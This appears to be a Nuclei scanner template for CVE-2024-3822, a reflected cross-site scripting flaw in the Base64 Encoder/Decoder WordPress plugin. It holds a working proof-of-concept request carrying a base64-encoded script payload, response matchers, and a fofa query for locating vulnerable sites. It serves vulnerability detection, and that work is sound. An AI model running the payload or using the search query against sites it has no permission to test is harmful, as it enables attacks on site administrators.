The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
PoC
id: CVE-2024-3822
info:
name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting
author: omranisecurity
severity: medium
description: |
The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
impact: |
Unauthenticated attackers can inject malicious JavaScript to target high-privilege users like administrators, potentially leading to session hijacking, privilege escalation, or administrative account compromise.
remediation: |
Upgrade to the latest version of the Base64 Encoder/Decoder plugin that addresses this XSS vulnerability.
reference:
- https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/
- https://nvd.nist.gov/vuln/detail/CVE-2024-3822
- https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-3822
cwe-id: CWE-79
epss-score: 0.00741
epss-percentile: 0.52894
metadata:
verified: true
max-request: 1
fofa-query: "wp-content/plugins/base64-encoderdecoder/"
tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "<p><script>alert(\"document.domain\")</script></p>")'
condition: and
# digest: 4a0a00473045022100e2931f13b6e7fa232ecac9f02cbbf5d0b1161564d7d04fa1c845cc046b77ad890220350eb3f4010ad72f92d3373a0c7989c0af9680b25b0d4dc33ecfc0aa0e7c8fd7:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.